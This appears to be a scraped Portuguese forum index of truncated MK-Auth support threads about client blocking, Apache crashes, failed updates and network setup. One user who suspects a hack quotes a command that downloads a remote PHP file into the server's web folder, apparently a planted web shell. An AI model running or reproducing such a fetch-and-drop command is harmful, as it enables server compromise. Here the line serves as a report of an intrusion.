O Mk-Auth versão 19.01 :: K4.9 não está bloqueando os inadimplentes pelo mac.
O Mk-Auth versão 19.01 :: K4.9 não está bloqueando os inadimplentes pelo mac.
Podem me ajudar a resolver?
Obs: O MAC já está fixado no cadastro.
Saiba mais…O Mk-Auth versão 19.01 :: K4.9 não está bloqueando os inadimplentes pelo mac.
Podem me ajudar a resolver?
Obs: O MAC já está fixado no cadastro.
Saiba mais…Boa tarde.
hoje me deparei com um problema que ja vem acontecendo a tempos.
o mk auth está com uma falha em seu apache, onde o mesmo gera sobrecarga ativando vários processos fazendo com que a maquina fica offline.
Saiba mais…Bom dia pessoal, alguem recomendo um Chatbot integrado com o mk-auth que seja confiavel e que tenha um bom serviço?
Saiba mais…boa tarde estou fazendo teste do sistemas para implantar no meu provedor e hoje estava fazendo os planos dos clientes e vir que tem o plano dedicado e o semi-dedicado so que os planos assim que sao finalizados e os clientes conectados no concentrador
Saiba mais…ALGUEM PODE ME AJUDAR ÉU AJUSTAR RELATORIO
NO MK esta saindo assim
1
2
alguem pode me ajudar
Saiba mais…Após atualizar para a versão 21 meu MKAuth não abre mais, verifiquei que o apache2 não está iniciando e está apresentando uma falha na linha 140 do apache2.conf (IncludeOptional mods-enabled/*.load), gostaria de ajuda para sanar está falha.
Saiba mais…Bom dia hoje meu mkauth amanheceu sem a barra de menus, sera que vai ter update sem ate final do dia sem a velha lenga lenga de formatar e começar do zero
Por favor algum uma base de 500 cliestes para recuperar
Saiba mais…Bom dia!
não consigo ver os logs.
o uptime e outras variaveis não funcionam mais.
acho que fui hackeado.
quando abri o mkauth hoje consegui ver esse comando:
wget http://131.196.4.58/mkfiles/e.php -O ../mkfiles/exp.php
aparentemente foi alterado ess
Saiba mais…Boa tarde, estou tentando instalar mkauth numa maquina e na hora boto pra iniciar a instalação ele fica em loop, testei o mesmo pendrive em outras maquina e esta bom.
Alguem poderia me ajudar?
Placa mae Asus A68HM-E33 v2
4gb ram ddr3
amd A4-4000
Saiba mais…Estou a procura do software EMS para a Olt V1600B1
pelo menos é o que tem na etiqueta dela, porem em algumas pesquisas me diseram se tratar da FD1104S da CData.
mesmo assim, não consegui o software compatível com ela...
Se alguem tiver informações p
Saiba mais…Aguardo retorno.
Grato.
Saiba mais…Pessoal me tirem uma dúvida ou me indiquem algumas formas de fazer isso, sou novo no ramo de provedor, ate uns dias usava somente 1 ip dedicado, mas começou a dá problema com jogos online e blacklist, entao a recebi um bloco com 14 ips da operadora,
Saiba mais…O sistema não altera em massa o plano bloqueado, seleciono todos os clientes e todas as paginas ele me da a confirmação de que foi alterado mais na verdade não altera. Alguém sabe como resolver?
Saiba mais…BOM DIA, DEPOIS DA ATUALIZAÇÃO O MKAUTH NÃO MOSTRA AS CONEXÕES DOS CLIENTES, CHAVE SSH FUNCIONA NORMAL E LIBERA O CLIENTE NORMALMENTE, MAS NÃO VEJO O TRÁFEGO E AS CONEXÕES.
Saiba mais…Arquivo PDF inválido.
Saiba mais…Boa tarde Pedro,
Teria como add nas variaveis disponiveis o "ESTADO CIVIL"?
Saiba mais…login as: root
Debian GNU/Linux 8
root@35.247.75.102's password:
Linux mk-auth 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for
Pessoal boa tarde,
Estou tendo dificuldades com o MKAUTH.
01 - Fiz a instalação
02 - Fiz o Registro
03 - Fiz o Update
Após isso quando reinicia o MKAUTH ele perde as configurações de rede e com isso estou tendo problemas para que o mesmo seja integrad